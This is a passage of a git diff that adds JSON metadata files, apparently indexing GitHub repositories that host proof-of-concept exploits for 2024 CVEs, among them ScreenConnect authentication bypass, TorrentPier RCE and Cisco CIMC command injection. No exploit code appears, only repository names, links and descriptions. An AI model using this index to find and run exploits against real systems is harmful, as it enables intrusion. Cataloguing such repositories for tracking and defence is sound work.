"https:\/\/github.com\/rat-c\/CVE-2024-1512", + "description": "PoC for CVE-2024-1512 in MasterStudy LMS WordPress Plugin.", + "fork": false, + "created_at": "2024-03-01T11:08:37Z", + "updated_at": "2024-09-25T18:00:24Z", + "pushed_at": "2024-03-01T11:18:20Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1561.json b/2024/CVE-2024-1561.json new file mode 100644 index 0000000000..08747a050a --- /dev/null +++ b/2024/CVE-2024-1561.json @@ -0,0 +1,64 @@ +[ + { + "id": 799218200, + "name": "CVE-2024-1561", + "full_name": "DiabloHTB\/CVE-2024-1561", + "owner": { + "login": "DiabloHTB", + "id": 124635368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124635368?v=4", + "html_url": "https:\/\/github.com\/DiabloHTB", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DiabloHTB\/CVE-2024-1561", + "description": "Poc for CVE-2024-1561 affecting Gradio 4.12.0", + "fork": false, + "created_at": "2024-05-11T13:44:46Z", + "updated_at": "2024-11-13T20:59:00Z", + "pushed_at": "2024-05-11T13:58:05Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 799663993, + "name": "Nuclei-Template-CVE-2024-1561", + "full_name": "DiabloHTB\/Nuclei-Template-CVE-2024-1561", + "owner": { + "login": "DiabloHTB", + "id": 124635368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124635368?v=4", + "html_url": "https:\/\/github.com\/DiabloHTB", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DiabloHTB\/Nuclei-Template-CVE-2024-1561", + "description": "Nuclei Templates ", + "fork": false, + "created_at": "2024-05-12T19:55:53Z", + "updated_at": "2024-05-12T20:24:09Z", + "pushed_at": "2024-05-12T20:17:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1642470.json b/2024/CVE-2024-1642470.json new file mode 100644 index 0000000000..113c6a236f --- /dev/null +++ b/2024/CVE-2024-1642470.json @@ -0,0 +1,33 @@ +[ + { + "id": 787003431, + "name": "CVE-2024-1642470", + "full_name": "Symbolexe\/CVE-2024-1642470", + "owner": { + "login": "Symbolexe", + "id": 140549630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140549630?v=4", + "html_url": "https:\/\/github.com\/Symbolexe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Symbolexe\/CVE-2024-1642470", + "description": "CVE-2024-1642470 is a critical vulnerability discovered in the Windows USB Generic Parent Driver. The vulnerability arises due to improper input validation within the driver's IOCTL handling mechanism. As a result, remote attackers can execute arbitrary code via crafted IOCTL requests, potentially leading to system compromise.", + "fork": false, + "created_at": "2024-04-15T17:51:59Z", + "updated_at": "2024-06-05T16:10:03Z", + "pushed_at": "2024-04-15T17:54:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1651.json b/2024/CVE-2024-1651.json new file mode 100644 index 0000000000..d87c7972e3 --- /dev/null +++ b/2024/CVE-2024-1651.json @@ -0,0 +1,99 @@ +[ + { + "id": 762235697, + "name": "CVE-2024-1651-PoC", + "full_name": "sharpicx\/CVE-2024-1651-PoC", + "owner": { + "login": "sharpicx", + "id": 44630640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44630640?v=4", + "html_url": "https:\/\/github.com\/sharpicx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sharpicx\/CVE-2024-1651-PoC", + "description": "Torrentpier v2.4.1. CVE-2024-1651. Remote Code Execution (RCE). Exploit.", + "fork": false, + "created_at": "2024-02-23T11:04:24Z", + "updated_at": "2024-11-20T16:30:40Z", + "pushed_at": "2024-03-07T10:23:52Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "rce", + "security", + "torrentpier" + ], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 765380419, + "name": "CVE-2024-1651-exploit-RCE", + "full_name": "hy011121\/CVE-2024-1651-exploit-RCE", + "owner": { + "login": "hy011121", + "id": 75035965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75035965?v=4", + "html_url": "https:\/\/github.com\/hy011121", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hy011121\/CVE-2024-1651-exploit-RCE", + "description": "(Mirorring)", + "fork": false, + "created_at": "2024-02-29T20:06:30Z", + "updated_at": "2024-05-31T16:53:29Z", + "pushed_at": "2024-02-29T21:09:19Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789059612, + "name": "CVE-2024-1651-PoC", + "full_name": "Whiteh4tWolf\/CVE-2024-1651-PoC", + "owner": { + "login": "Whiteh4tWolf", + "id": 53398803, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53398803?v=4", + "html_url": "https:\/\/github.com\/Whiteh4tWolf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Whiteh4tWolf\/CVE-2024-1651-PoC", + "description": null, + "fork": false, + "created_at": "2024-04-19T16:18:59Z", + "updated_at": "2024-04-19T16:20:44Z", + "pushed_at": "2024-04-19T16:20:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1655.json b/2024/CVE-2024-1655.json new file mode 100644 index 0000000000..2dd8106d6b --- /dev/null +++ b/2024/CVE-2024-1655.json @@ -0,0 +1,33 @@ +[ + { + "id": 796642361, + "name": "CVE-2024-1655", + "full_name": "lnversed\/CVE-2024-1655", + "owner": { + "login": "lnversed", + "id": 46649884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46649884?v=4", + "html_url": "https:\/\/github.com\/lnversed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lnversed\/CVE-2024-1655", + "description": null, + "fork": false, + "created_at": "2024-05-06T10:56:47Z", + "updated_at": "2024-05-06T10:57:22Z", + "pushed_at": "2024-05-06T10:57:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1698.json b/2024/CVE-2024-1698.json new file mode 100644 index 0000000000..c85a24fa70 --- /dev/null +++ b/2024/CVE-2024-1698.json @@ -0,0 +1,95 @@ +[ + { + "id": 779111890, + "name": "CVE-2024-1698-Exploit", + "full_name": "kamranhasan\/CVE-2024-1698-Exploit", + "owner": { + "login": "kamranhasan", + "id": 53407467, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53407467?v=4", + "html_url": "https:\/\/github.com\/kamranhasan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kamranhasan\/CVE-2024-1698-Exploit", + "description": "This is an exploit script to find out wordpress admin's username and password hash by exploiting CVE-2024-1698.", + "fork": false, + "created_at": "2024-03-29T04:11:06Z", + "updated_at": "2024-09-28T13:23:52Z", + "pushed_at": "2024-03-29T04:31:31Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872446949, + "name": "CVE-2024-1698", + "full_name": "shanglyu\/CVE-2024-1698", + "owner": { + "login": "shanglyu", + "id": 62023200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62023200?v=4", + "html_url": "https:\/\/github.com\/shanglyu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shanglyu\/CVE-2024-1698", + "description": null, + "fork": false, + "created_at": "2024-10-14T13:02:26Z", + "updated_at": "2024-10-14T13:09:39Z", + "pushed_at": "2024-10-14T13:09:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889535406, + "name": "WordPress-NotificationX-CVE-2024-1698", + "full_name": "jesicatjan\/WordPress-NotificationX-CVE-2024-1698", + "owner": { + "login": "jesicatjan", + "id": 122602674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122602674?v=4", + "html_url": "https:\/\/github.com\/jesicatjan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jesicatjan\/WordPress-NotificationX-CVE-2024-1698", + "description": null, + "fork": false, + "created_at": "2024-11-16T15:21:24Z", + "updated_at": "2024-11-20T03:35:53Z", + "pushed_at": "2024-11-19T05:06:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1709.json b/2024/CVE-2024-1709.json new file mode 100644 index 0000000000..3e11c61bc9 --- /dev/null +++ b/2024/CVE-2024-1709.json @@ -0,0 +1,197 @@ +[ + { + "id": 761127845, + "name": "ScreenConnect-AuthBypass-RCE", + "full_name": "W01fh4cker\/ScreenConnect-AuthBypass-RCE", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/ScreenConnect-AuthBypass-RCE", + "description": "ScreenConnect AuthBypass(cve-2024-1709) --> RCE!!!", + "fork": false, + "created_at": "2024-02-21T09:42:04Z", + "updated_at": "2024-11-21T14:01:57Z", + "pushed_at": "2024-07-16T09:26:55Z", + "stargazers_count": 94, + "watchers_count": 94, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "attack", + "auth", + "bypass", + "connectwise", + "cve-2024-1708", + "cve-2024-1709", + "redteam", + "screenconnect" + ], + "visibility": "public", + "forks": 26, + "watchers": 94, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 762393021, + "name": "CVE-2024-1709", + "full_name": "HussainFathy\/CVE-2024-1709", + "owner": { + "login": "HussainFathy", + "id": 76268960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76268960?v=4", + "html_url": "https:\/\/github.com\/HussainFathy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HussainFathy\/CVE-2024-1709", + "description": "A Scanner for CVE-2024-1709 - ConnectWise SecureConnect Authentication Bypass Vulnerability", + "fork": false, + "created_at": "2024-02-23T17:26:28Z", + "updated_at": "2024-04-02T03:28:07Z", + "pushed_at": "2024-02-26T12:00:23Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 776185551, + "name": "CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass", + "full_name": "sxyrxyy\/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass", + "owner": { + "login": "sxyrxyy", + "id": 125439203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125439203?v=4", + "html_url": "https:\/\/github.com\/sxyrxyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sxyrxyy\/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass", + "description": null, + "fork": false, + "created_at": "2024-03-22T21:20:19Z", + "updated_at": "2024-03-22T21:20:44Z", + "pushed_at": "2024-03-22T21:32:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780750161, + "name": "CVE-2024-1709-and-CVE-2024-1708", + "full_name": "cjybao\/CVE-2024-1709-and-CVE-2024-1708", + "owner": { + "login": "cjybao", + "id": 61445855, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61445855?v=4", + "html_url": "https:\/\/github.com\/cjybao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cjybao\/CVE-2024-1709-and-CVE-2024-1708", + "description": null, + "fork": false, + "created_at": "2024-04-02T04:58:38Z", + "updated_at": "2024-04-03T03:43:48Z", + "pushed_at": "2024-04-02T07:58:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856582109, + "name": "Event-ID-229-Rule-Name-SOC262-CVE-2024-1709-", + "full_name": "AhmedMansour93\/Event-ID-229-Rule-Name-SOC262-CVE-2024-1709-", + "owner": { + "login": "AhmedMansour93", + "id": 179945455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179945455?v=4", + "html_url": "https:\/\/github.com\/AhmedMansour93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AhmedMansour93\/Event-ID-229-Rule-Name-SOC262-CVE-2024-1709-", + "description": "Event ID 229 Rule Name SOC262 ScreenConnect Authentication Bypass Exploitation Detected (CVE-2024-1709)", + "fork": false, + "created_at": "2024-09-12T20:31:19Z", + "updated_at": "2024-09-12T20:31:52Z", + "pushed_at": "2024-09-12T20:31:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 873464505, + "name": "Mass-CVE-2024-1709", + "full_name": "AMRICHASFUCK\/Mass-CVE-2024-1709", + "owner": { + "login": "AMRICHASFUCK", + "id": 92443330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92443330?v=4", + "html_url": "https:\/\/github.com\/AMRICHASFUCK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AMRICHASFUCK\/Mass-CVE-2024-1709", + "description": "ScreenConnect AuthBypass Mass RCE", + "fork": false, + "created_at": "2024-10-16T08:05:35Z", + "updated_at": "2024-10-18T16:53:30Z", + "pushed_at": "2024-10-16T08:38:05Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1781.json b/2024/CVE-2024-1781.json new file mode 100644 index 0000000000..c5bcebb560 --- /dev/null +++ b/2024/CVE-2024-1781.json @@ -0,0 +1,33 @@ +[ + { + "id": 756338567, + "name": "CVE-2024-1781", + "full_name": "Icycu123\/CVE-2024-1781", + "owner": { + "login": "Icycu123", + "id": 89123126, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89123126?v=4", + "html_url": "https:\/\/github.com\/Icycu123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Icycu123\/CVE-2024-1781", + "description": "CVE-2024-1781", + "fork": false, + "created_at": "2024-02-12T13:26:03Z", + "updated_at": "2024-03-14T12:34:11Z", + "pushed_at": "2024-02-12T13:54:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1874.json b/2024/CVE-2024-1874.json new file mode 100644 index 0000000000..1e28fa4342 --- /dev/null +++ b/2024/CVE-2024-1874.json @@ -0,0 +1,64 @@ +[ + { + "id": 787746052, + "name": "-CVE-2024-1874-", + "full_name": "ox1111\/-CVE-2024-1874-", + "owner": { + "login": "ox1111", + "id": 31942498, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31942498?v=4", + "html_url": "https:\/\/github.com\/ox1111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ox1111\/-CVE-2024-1874-", + "description": "command injection", + "fork": false, + "created_at": "2024-04-17T05:26:34Z", + "updated_at": "2024-04-17T05:26:34Z", + "pushed_at": "2024-04-17T05:26:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 830599691, + "name": "CVE-2024-1874", + "full_name": "Tgcohce\/CVE-2024-1874", + "owner": { + "login": "Tgcohce", + "id": 91344858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91344858?v=4", + "html_url": "https:\/\/github.com\/Tgcohce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tgcohce\/CVE-2024-1874", + "description": "Proof Of Concept for CVE-2024-1874", + "fork": false, + "created_at": "2024-07-18T15:25:17Z", + "updated_at": "2024-09-19T18:30:06Z", + "pushed_at": "2024-09-19T18:30:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1931.json b/2024/CVE-2024-1931.json new file mode 100644 index 0000000000..d47aaa0f8a --- /dev/null +++ b/2024/CVE-2024-1931.json @@ -0,0 +1,33 @@ +[ + { + "id": 842021663, + "name": "CVE-2024-1931-reproduction", + "full_name": "passer12\/CVE-2024-1931-reproduction", + "owner": { + "login": "passer12", + "id": 93042040, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93042040?v=4", + "html_url": "https:\/\/github.com\/passer12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passer12\/CVE-2024-1931-reproduction", + "description": "CVE-2024-1931-reproduction", + "fork": false, + "created_at": "2024-08-13T14:09:20Z", + "updated_at": "2024-08-13T14:10:30Z", + "pushed_at": "2024-08-13T14:10:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1939.json b/2024/CVE-2024-1939.json new file mode 100644 index 0000000000..d4eff0ad66 --- /dev/null +++ b/2024/CVE-2024-1939.json @@ -0,0 +1,33 @@ +[ + { + "id": 847292131, + "name": "CVE-2024-1939", + "full_name": "rycbar77\/CVE-2024-1939", + "owner": { + "login": "rycbar77", + "id": 35279858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35279858?v=4", + "html_url": "https:\/\/github.com\/rycbar77", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rycbar77\/CVE-2024-1939", + "description": "For V8CTF M122", + "fork": false, + "created_at": "2024-08-25T12:08:54Z", + "updated_at": "2024-11-18T10:55:45Z", + "pushed_at": "2024-08-25T12:42:14Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20017.json b/2024/CVE-2024-20017.json new file mode 100644 index 0000000000..c5b4c4ed5a --- /dev/null +++ b/2024/CVE-2024-20017.json @@ -0,0 +1,33 @@ +[ + { + "id": 849722373, + "name": "cve-2024-20017", + "full_name": "mellow-hype\/cve-2024-20017", + "owner": { + "login": "mellow-hype", + "id": 25216562, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25216562?v=4", + "html_url": "https:\/\/github.com\/mellow-hype", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mellow-hype\/cve-2024-20017", + "description": "exploits for CVE-2024-20017", + "fork": false, + "created_at": "2024-08-30T05:54:36Z", + "updated_at": "2024-11-20T16:31:03Z", + "pushed_at": "2024-09-07T10:11:22Z", + "stargazers_count": 134, + "watchers_count": 134, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 134, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20291.json b/2024/CVE-2024-20291.json new file mode 100644 index 0000000000..5415a9f620 --- /dev/null +++ b/2024/CVE-2024-20291.json @@ -0,0 +1,33 @@ +[ + { + "id": 766433376, + "name": "CVE-2024-20291-POC", + "full_name": "Instructor-Team8\/CVE-2024-20291-POC", + "owner": { + "login": "Instructor-Team8", + "id": 61094918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61094918?v=4", + "html_url": "https:\/\/github.com\/Instructor-Team8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Instructor-Team8\/CVE-2024-20291-POC", + "description": "CVE-2024-20291-POC exploit ---> RCE", + "fork": false, + "created_at": "2024-03-03T08:53:14Z", + "updated_at": "2024-04-26T15:34:10Z", + "pushed_at": "2024-03-09T18:14:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20338.json b/2024/CVE-2024-20338.json new file mode 100644 index 0000000000..e2ff436e34 --- /dev/null +++ b/2024/CVE-2024-20338.json @@ -0,0 +1,33 @@ +[ + { + "id": 813167804, + "name": "CVE-2024-20338", + "full_name": "annmuor\/CVE-2024-20338", + "owner": { + "login": "annmuor", + "id": 1037402, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1037402?v=4", + "html_url": "https:\/\/github.com\/annmuor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/annmuor\/CVE-2024-20338", + "description": "CVE-2024-20338 talk for Behind The Code Talk", + "fork": false, + "created_at": "2024-06-10T15:41:41Z", + "updated_at": "2024-06-20T16:27:44Z", + "pushed_at": "2024-06-10T20:13:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20356.json b/2024/CVE-2024-20356.json new file mode 100644 index 0000000000..460576424c --- /dev/null +++ b/2024/CVE-2024-20356.json @@ -0,0 +1,68 @@ +[ + { + "id": 785760205, + "name": "CVE-2024-20356", + "full_name": "nettitude\/CVE-2024-20356", + "owner": { + "login": "nettitude", + "id": 11998401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11998401?v=4", + "html_url": "https:\/\/github.com\/nettitude", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nettitude\/CVE-2024-20356", + "description": "This is a proof of concept for CVE-2024-20356, a Command Injection vulnerability in Cisco's CIMC.", + "fork": false, + "created_at": "2024-04-12T15:07:42Z", + "updated_at": "2024-11-27T20:52:39Z", + "pushed_at": "2024-04-18T14:31:34Z", + "stargazers_count": 54, + "watchers_count": 54, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cimc", + "cisco", + "cve-2024-20356" + ], + "visibility": "public", + "forks": 11, + "watchers": 54, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 803051557, + "name": "CVE_2024_20356", + "full_name": "SherllyNeo\/CVE_2024_20356", + "owner": { + "login": "SherllyNeo", + "id": 104321419, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104321419?v=4", + "html_url": "https:\/\/github.com\/SherllyNeo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SherllyNeo\/CVE_2024_20356", + "description": "A oxidized version of https:\/\/github.com\/nettitude\/CVE-2024-20356\/blob\/main\/CVE-2024-20356.py", + "fork": false, + "created_at": "2024-05-20T00:57:01Z", + "updated_at": "2024-05-30T15:05:41Z", + "pushed_at": "2024-05-27T17:54:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20404.json b/2024/CVE-2024-20404.json new file mode 100644 index 0000000000..cd5bfc17d4 --- /dev/null +++ b/2024/CVE-2024-20404.json @@ -0,0 +1,33 @@ +[ + { + "id": 812743717, + "name": "CVE-2024-20404", + "full_name": "AbdElRahmanEzzat1995\/CVE-2024-20404", + "owner": { + "login": "AbdElRahmanEzzat1995", + "id": 67908228, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67908228?v=4", + "html_url": "https:\/\/github.com\/AbdElRahmanEzzat1995", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbdElRahmanEzzat1995\/CVE-2024-20404", + "description": null, + "fork": false, + "created_at": "2024-06-09T18:50:59Z", + "updated_at": "2024-10-07T10:30:00Z", + "pushed_at": "2024-06-09T18:51:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20405.json b/2024/CVE-2024-20405.json new file mode 100644 index 0000000000..73102912c6 --- /dev/null +++ b/2024/CVE-2024-20405.json @@ -0,0 +1,33 @@ +[ + { + "id": 812744797, + "name": "CVE-2024-20405", + "full_name": "AbdElRahmanEzzat1995\/CVE-2024-20405", + "owner": { + "login": "AbdElRahmanEzzat1995", + "id": 67908228, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67908228?v=4", + "html_url": "https:\/\/github.com\/AbdElRahmanEzzat1995", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbdElRahmanEzzat1995\/CVE-2024-20405", + "description": null, + "fork": false, + "created_at": "2024-06-09T18:55:03Z", + "updated_at": "2024-06-11T01:50:57Z", + "pushed_at": "2024-06-09T18:55:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20467.json b/2024/CVE-2024-20467.json new file mode 100644 index 0000000000..53047b6fa8 --- /dev/null +++ b/2024/CVE-2024-20467.json @@ -0,0 +1,33 @@ +[ + { + "id": 864676343, + "name": "PoC-Exploit-CVE-2024-20467", + "full_name": "saler-cve\/PoC-Exploit-CVE-2024-20467", + "owner": { + "login": "saler-cve", + "id": 182943844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/182943844?v=4", + "html_url": "https:\/\/github.com\/saler-cve", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saler-cve\/PoC-Exploit-CVE-2024-20467", + "description": null, + "fork": false, + "created_at": "2024-09-28T21:23:00Z", + "updated_at": "2024-09-28T21:23:38Z", + "pushed_at": "2024-09-28T21:23:35Z", + "stargazers_count": 0, + 